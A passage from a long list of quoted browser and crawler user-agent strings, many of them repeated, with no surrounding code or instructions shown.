NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3', 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0', 'Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0', 'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0', 'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 'Mozilla/5.0(compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)', 'Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)', 'Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+', 'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+', 'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5', 'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25', 'Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10', 'Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3', 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0', 'Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0', 'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0', 'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 'Mozilla/5.0(compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)', 'Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)', 'Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+', 'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+', 'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5', 'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25', 'Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10', 'Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) 